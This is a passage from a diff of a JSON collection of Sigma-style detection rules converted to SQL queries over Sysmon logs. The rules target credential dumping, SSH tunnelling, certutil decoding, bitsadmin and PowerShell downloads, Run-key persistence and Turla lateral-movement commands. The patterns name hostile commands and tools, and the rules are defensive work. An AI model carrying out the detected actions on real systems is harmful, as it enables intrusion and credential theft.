'%.ocx #%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%EDGEHTML.dll%' ESCAPE '\\' AND CommandLine LIKE '%#141%' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\Msbuild\\\\Current\\\\Bin\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Tracker.exe%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\FileTracker32.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker32.dll\",#1%' ESCAPE '\\' OR CommandLine 
LIKE '%\\\\FileTracker64.dll,#1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FileTracker64.dll\",#1%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_by_ordinal.yml" + "filename": "proc_creation_win_ssh_port_forward.yml" }, { - "title": "Copy from Admin Share", - "id": "855bc8b5-2ae8-402e-a9ed-b889e6df1900", - "status": "test", - "description": "Detects a suspicious copy command to or from an Admin share or remote", - "author": "Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali", + "title": "Use Short Name Path in Command Line", + "id": "349d891d-fef0-4fe4-bc53-eee623a15969", + "status": "experimental", + "description": "Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection", + "author": "frack113, Nasreddine Bencherchali", "tags": [ - "attack.lateral_movement", - "attack.collection", - "attack.exfiltration", - "attack.t1039", - "attack.t1048", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Administrative scripts" + "Applications could use this notation occasionally which might generate some false positives. In that case investigate the parent and child process." 
], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\') OR CommandLine LIKE '%\\\\Sysvol\\\\%' ESCAPE '\\') AND ((((Image LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR Image LIKE '%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE')) OR ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%copy%' ESCAPE '\\')) OR (((Image LIKE '%\\\\powershell.exe%' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe%' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%~1\\\\%' ESCAPE '\\' OR CommandLine LIKE '%~2\\\\%' ESCAPE '\\') AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\Dism.exe' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Program Files\\\\GPSoftware\\\\Directory Opus\\\\dopus.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\thor\\\\thor64.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\veam.backup.shell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\winget.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Everything\\\\Everything.exe' ESCAPE '\\') OR ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\' OR (CommandLine LIKE '%\\\\appdata\\\\local\\\\webex\\\\webex64\\\\meetings\\\\wbxreport.exe%' ESCAPE '\\' OR 
CommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\post-install.bat%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files\\\\Git\\\\cmd\\\\scalar.exe%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_copy_lateral_movement.yml" + "filename": "proc_creation_win_susp_ntfs_short_name_path_use_cli.yml" }, { - "title": "Uninstall Sysinternals Sysmon", - "id": "6a5f68d1-c4b5-46b9-94ee-5324892ea939", + "title": "File Decoded From Base64/Hex Via Certutil.EXE", + "id": "cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7", "status": "test", - "description": "Detects the removal of Sysmon, which could be a potential attempt at defense evasion", - "author": "frack113", + "description": "Detects the execution of certutil with either the \"decode\" or \"decodehex\" flags to decode base64 or hex encoded files. This can be abused by attackers to decode an encoded payload before execution", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1027" ], "falsepositives": [ - "Legitimate administrators might use this command to remove Sysmon for debugging purposes" + "Unknown" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-decode %' ESCAPE '\\' OR CommandLine LIKE '%/decode %' ESCAPE '\\' OR CommandLine LIKE '%-decodehex %' ESCAPE '\\' OR CommandLine LIKE '%/decodehex %' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_certutil_decode.yml" + }, + { + "title": "PUA - Fast Reverse Proxy (FRP) Execution", + "id": "32410e29-5f94-4568-b6a3-d91a8adad863", + "status": "experimental", + "description": "Detects the use of Fast Reverse Proxy. 
frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.", + "author": "frack113, Florian Roth", + "tags": [ + "attack.command_and_control", + "attack.t1090" + ], + "falsepositives": [ + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Sysmon.exe' ESCAPE '\\') OR Description = 'System activity monitor') AND (CommandLine LIKE '%-u%' ESCAPE '\\' OR CommandLine LIKE '%/u%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\frpc.exe' ESCAPE '\\' OR Image LIKE '%\\\\frps.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\frpc.ini%' ESCAPE '\\' OR (Hashes LIKE '%MD5=7D9C233B8C9E3F0EA290D2B84593C842%' ESCAPE '\\' OR Hashes LIKE '%SHA1=06DDC9280E1F1810677935A2477012960905942F%' ESCAPE '\\' OR Hashes LIKE '%SHA256=57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C%' ESCAPE '\\') OR md5 = '7d9c233b8c9e3f0ea290d2b84593c842' OR sha1 = '06ddc9280e1f1810677935a2477012960905942f' OR sha256 = '57b0936b8d336d8e981c169466a15a5fd21a7d5a2c7daf62d5e142ee860e387c'))" ], - "filename": "proc_creation_win_sysinternals_sysmon_uninstall.yml" + "filename": "proc_creation_win_pua_frp.yml" }, { - "title": "Potential AMSI Bypass Using NULL Bits - ProcessCreation", - "id": "92a974db-ab84-457f-9ec0-55db83d7a825", + "title": "Microsoft IIS Service Account Password Dumped", + "id": "2d3cdeec-c0db-45b4-aa86-082f7eb75701", "status": "experimental", - "description": "Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords", + "author": "Tim Rauch, Janantha Marasinghe", "tags": [ - 
"attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%if(0){{{0}}}'' -f $(0 -as [char]) +%' ESCAPE '\\' OR CommandLine LIKE '%#%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND CommandLine LIKE '%list %' ESCAPE '\\') AND ((CommandLine LIKE '% /config%' ESCAPE '\\' OR CommandLine LIKE '% /xml%' ESCAPE '\\' OR CommandLine LIKE '% -config%' ESCAPE '\\' OR CommandLine LIKE '% -xml%' ESCAPE '\\') OR ((CommandLine LIKE '% /@t%' ESCAPE '\\' OR CommandLine LIKE '% /text%' ESCAPE '\\' OR CommandLine LIKE '% /show%' ESCAPE '\\' OR CommandLine LIKE '% -@t%' ESCAPE '\\' OR CommandLine LIKE '% -text%' ESCAPE '\\' OR CommandLine LIKE '% -show%' ESCAPE '\\') AND (CommandLine LIKE '%:\\*' ESCAPE '\\' OR CommandLine LIKE '%password%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_amsi_null_bits_bypass.yml" + "filename": "proc_creation_win_iis_appcmd_service_account_password_dumped.yml" }, { - "title": "New Network Trace Capture Started Via Netsh.EXE", - "id": "d3c3861d-c504-4c77-ba55-224ba82d0118", - "status": "test", - "description": "Detects the execution of netsh with the \"trace\" flag in order to start a network capture", - "author": "Kutepov Anton, oscd.community", + "title": "UEFI Persistence Via Wpbbin - ProcessCreation", + "id": "4abc0ec4-db5a-412f-9632-26659cddf145", + "status": "experimental", + "description": "Detects execution of the binary \"wpbbin\" which is used as part of the UEFI based persistence method described in the reference section", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - 
"attack.credential_access", - "attack.t1040" + "attack.persistence", + "attack.defense_evasion", + "attack.t1542.001" ], "falsepositives": [ - "Legitimate administration activity" + "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_netsh_packet_capture.yml" + "filename": "proc_creation_win_wpbbin_potential_persistence.yml" }, { - "title": "DumpStack.log Defender Evasion", - "id": "4f647cfa-b598-4e12-ad69-c68dd16caef8", - "status": "test", - "description": "Detects the use of the filename DumpStack.log to evade Microsoft Defender", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Persistence Via Microsoft Compatibility Appraiser", + "id": "f548a603-c9f2-4c89-b511-b089f7e94549", + "status": "experimental", + "description": "Detects manual execution of the \"Microsoft Compatibility Appraiser\" task via schtasks.\nIn order to trigger persistence stored in the \"\\AppCompatFlags\\TelemetryController\" registry key.\n", + "author": "Sreeman", "tags": [ - "attack.defense_evasion" + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DumpStack.log' ESCAPE '\\' OR CommandLine LIKE '% -o DumpStack.log%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%run %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Application Experience\\\\Microsoft Compatibility Appraiser%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_dumpstack_log_evasion.yml" + "filename": "proc_creation_win_schtasks_persistence_windows_telemetry.yml" }, { - "title": "Potential PowerShell Obfuscation Via WCHAR", - "id": "e312efd0-35a1-407f-8439-b8d434b438a6", + "title": "Proxy Execution via Wuauclt", + "id": "af77cf95-c469-471c-b6a0-946c685c4798", "status": "test", - "description": "Detects suspicious encoded character syntax often used for defense evasion", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1027" + "attack.t1218", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%(WCHAR)0x%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%RunHandlerComServer%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /UpdateDeploymentProvider UpdateDeploymentProvider.dll %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_obfuscation_via_utf8.yml" + "filename": "proc_creation_win_lolbin_wuauclt.yml" }, { - 
"title": "PowerShell Download Pattern", - "id": "3b6ab547-8ec2-4991-b9d2-2b06702a48d7", - "status": "test", - "description": "Detects a Powershell process that contains download commands in its command line string", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "Use of UltraVNC Remote Access Software", + "id": "145322e4-0fd3-486b-81ca-9addc75736d8", + "status": "experimental", + "description": "An adversary may use legitimate desktop support and remote access software,to establish an interactive command and control channel to target systems within networks", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%new-object%' ESCAPE '\\' AND CommandLine LIKE '%net.webclient).%' ESCAPE '\\' AND CommandLine LIKE '%download%' ESCAPE '\\' AND (CommandLine LIKE '%string(%' ESCAPE '\\' OR CommandLine LIKE '%file(%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'VNCViewer' OR Product = 'UltraVNC VNCViewer' OR Company = 'UltraVNC' OR OriginalFileName = 'VNCViewer.exe'))" ], - "filename": "proc_creation_win_powershell_download_patterns.yml" + "filename": "proc_creation_win_ultravnc.yml" }, { - "title": "Suspicious Execution of InstallUtil Without Log", - "id": "d042284c-a296-4988-9be5-f424fadcc28c", - "status": "test", - "description": "Uses the .NET InstallUtil.exe application in order to execute image without log", - "author": "frack113", + "title": "Renamed Office Binary Execution", + "id": 
"0b0cd537-fc77-4e6e-a973-e53495c1083d", + "status": "experimental", + "description": "Detects the execution of a renamed office binary", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' AND Image LIKE '%Microsoft.NET\\\\Framework%' ESCAPE '\\' AND CommandLine LIKE '%/logfile= %' ESCAPE '\\' AND CommandLine LIKE '%/LogToConsole=false%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('Excel.exe', 'MSACCESS.EXE', 'OneNote.exe', 'POWERPNT.EXE', 'WinWord.exe') OR Description IN ('Microsoft Access', 'Microsoft Excel', 'Microsoft OneNote', 'Microsoft PowerPoint', 'Microsoft Word')) AND NOT ((Image LIKE '%\\\\EXCEL.exe' ESCAPE '\\' OR Image LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR Image LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR Image LIKE '%\\\\POWERPNT.EXE' ESCAPE '\\' OR Image LIKE '%\\\\WINWORD.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_instalutil_no_log_execution.yml" + "filename": "proc_creation_win_renamed_office_processes.yml" }, { - "title": "UAC Bypass Using Windows Media Player - Process", - "id": "0058b9e5-bcd7-40d4-9205-95ca5a16d7b2", + "title": "Execution via stordiag.exe", + "id": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", "status": "test", - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe", + "author": "Austin Songer (@austinsonger)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1218" ], "falsepositives": [ - "Unknown" + 
"Legitimate usage of stordiag.exe." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE 'C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\mmc.exe\" \"C:\\\\Windows\\\\system32\\\\eventvwr.msc\" /s' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\stordiag.exe' ESCAPE '\\' AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\fltmc.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'c:\\\\windows\\\\system32\\\\%' ESCAPE '\\' OR ParentImage LIKE 'c:\\\\windows\\\\syswow64\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_wmp.yml" + "filename": "proc_creation_win_stordiag_susp_child_process.yml" }, { - "title": "Use of UltraVNC Remote Access Software", - "id": "145322e4-0fd3-486b-81ca-9addc75736d8", - "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software,to establish an interactive command and control channel to target systems within networks", - "author": "frack113", + "title": "Potential Persistence Attempt Via Run Keys Using Reg.EXE", + "id": "de587dce-915e-4218-aac4-835ca6af6f70", + "status": "test", + "description": "Detects suspicious command line reg.exe tool adding key to RUN key in Registry", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate use" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", + "Legitimate 
administrator sets up autorun keys for legitimate reasons.", + "Discord" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'VNCViewer' OR Product = 'UltraVNC VNCViewer' OR Company = 'UltraVNC' OR OriginalFileName = 'VNCViewer.exe'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\' AND CommandLine LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\')" ], - "filename": "proc_creation_win_ultravnc.yml" + "filename": "proc_creation_win_reg_add_run_key.yml" }, { - "title": "Automated Collection Command Prompt", - "id": "f576a613-2392-4067-9d1a-9345fb58d8d1", + "title": "Script Interpreter Execution From Suspicious Folder", + "id": "1228c958-e64e-4e71-92ad-7d429f4138ba", "status": "test", - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", - "author": "frack113", + "description": "Detects a suspicious script executions in temporary folders or folders accessible by environment variables", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1119", - "attack.credential_access", - "attack.t1552.001" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%.doc%' ESCAPE '\\' OR CommandLine LIKE '%.docx%' ESCAPE '\\' OR CommandLine LIKE '%.xls%' ESCAPE '\\' OR CommandLine LIKE '%.xlsx%' ESCAPE '\\' OR CommandLine LIKE '%.ppt%' ESCAPE '\\' OR CommandLine LIKE '%.pptx%' ESCAPE '\\' OR CommandLine LIKE '%.rtf%' ESCAPE '\\' OR CommandLine LIKE '%.pdf%' ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\') AND 
((CommandLine LIKE '%dir %' ESCAPE '\\' AND CommandLine LIKE '% /b %' ESCAPE '\\' AND CommandLine LIKE '% /s %' ESCAPE '\\') OR (OriginalFileName = 'FINDSTR.EXE' AND (CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /si %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass %' ESCAPE '\\' OR CommandLine LIKE '%/e:vbscript %' ESCAPE '\\' OR CommandLine LIKE '%/e:javascript %' ESCAPE '\\') OR OriginalFileName IN ('powershell.exe', 'pwsh.dll', 'mshta.exe', 'wscript.exe', 'cscript.exe', 'cmd.exe')) AND (Image LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR Image LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR Image LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_automated_collection.yml" + "filename": "proc_creation_win_susp_script_exec_from_env_folder.yml" }, { - "title": "Use of TTDInject.exe", - "id": "b27077d6-23e6-45d2-81a0-e2b356eea5fd", - "status": "experimental", - "description": "Detects the executiob of TTDInject.exe, which is used by Windows 10 v1809 and newer to debug time travel (underlying call of tttracer.exe)", - "author": "frack113", + "title": "HackTool - Windows Credential Editor (WCE) Execution", + "id": "7aa7009a-28b9-4344-8c1f-159489a390df", + "status": "test", + "description": "Detects the use of Windows Credential Editor (WCE)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - 
"attack.t1127" + "attack.credential_access", + "attack.t1003.001", + "attack.s0005" ], "falsepositives": [ - "Legitimate use" + "Another service that uses a single -s command line switch" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%ttdinject.exe' ESCAPE '\\' OR OriginalFileName = 'TTDInject.EXE'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Imphash IN ('a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2') OR (Hashes LIKE '%IMPHASH=a53a02b997935fd8eedcb5f7abab9b9f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e96a73c7bf33a464c510ede582318bf2%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -S' ESCAPE '\\' AND ParentImage LIKE '%\\\\services.exe' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\clussvc.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_ttdinject.yml" + "filename": "proc_creation_win_hktl_wce.yml" }, { - "title": "Sdclt Child Processes", - "id": "da2738f2-fadb-4394-afa7-0a0674885afa", + "title": "Turla Group Lateral Movement", + "id": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f", "status": "test", - "description": "A General detection for sdclt spawning new processes. 
This could be an indicator of sdclt being used for bypass UAC techniques.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects automated lateral movement by Turla group", + "author": "Markus Neis", "tags": [ - "attack.privilege_escalation", - "attack.t1548.002" + "attack.g0010", + "attack.execution", + "attack.t1059", + "attack.lateral_movement", + "attack.t1021.002", + "attack.discovery", + "attack.t1083", + "attack.t1135" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\sdclt.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE 'net use \\\\\\\\\\%DomainController\\%\\\\C$ \"P@ssw0rd\" %' ESCAPE '\\' OR CommandLine LIKE 'dir c:\\\\%.doc% /s' ESCAPE '\\' OR CommandLine LIKE 'dir \\%TEMP\\%\\\\%.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sdclt_child_process.yml" + "filename": "proc_creation_win_apt_turla_commands_critical.yml" }, { - "title": "Suspicious Download From Direct IP Via Bitsadmin", - "id": "99c840f2-2012-46fd-9141-c761987550ef", - "status": "experimental", - "description": "Detects usage of bitsadmin downloading a file using an URL that contains an IP", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Arbitrary DLL Load Using Winword", + "id": "f7375e28-5c14-432f-b8d1-1db26c832df3", + "status": "test", + "description": "Detects potential DLL sideloading using the Microsoft Office winword process via the '/l' flag.", + "author": "Victor Sergeev, oscd.community", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND 
Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%://1%' ESCAPE '\\' OR CommandLine LIKE '%://2%' ESCAPE '\\' OR CommandLine LIKE '%://3%' ESCAPE '\\' OR CommandLine LIKE '%://4%' ESCAPE '\\' OR CommandLine LIKE '%://5%' ESCAPE '\\' OR CommandLine LIKE '%://6%' ESCAPE '\\' OR CommandLine LIKE '%://7%' ESCAPE '\\' OR CommandLine LIKE '%://8%' ESCAPE '\\' OR CommandLine LIKE '%://9%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%://7-%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR OriginalFileName = 'WinWord.exe') AND (CommandLine LIKE '%/l %' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_bitsadmin_download_direct_ip.yml" + "filename": "proc_creation_win_office_winword_dll_load.yml" }, { - "title": "Suspicious Parent Double Extension File Execution", - "id": "5e6a80c8-2d45-4633-9ef4-fa2671a39c5c", - "status": "experimental", - "description": "Detect execution of suspicious double extension files in ParentCommandLine", - "author": "frack113, Nasreddine Bencherchali 